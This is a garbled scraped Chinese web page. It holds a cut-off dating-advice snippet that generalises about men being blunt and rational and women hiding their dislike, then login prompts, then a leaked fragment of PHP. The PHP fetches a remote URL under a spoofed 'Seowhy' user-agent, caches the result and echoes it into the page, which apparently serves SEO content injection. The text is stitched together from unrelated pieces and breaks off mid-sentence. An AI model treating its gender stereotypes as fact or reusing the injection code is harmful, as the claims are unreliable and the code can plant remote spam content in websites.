在男女相处中,男生的理性思维往往不受女生的欢迎,还会被称为直男,而在女生的感性思维里,就算在不喜欢一个人,也不会表现在脸上,这就是为什么女生都会被称为“影后”。 在男生的认知里爱恨是分明的,如果男生不喜欢一个人,会直接把冷漠摆在脸上,但女生却相反,在你面前冷漠脸的女生可能在暗恋你,在你面
2021-11-29 680
显示验证码
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>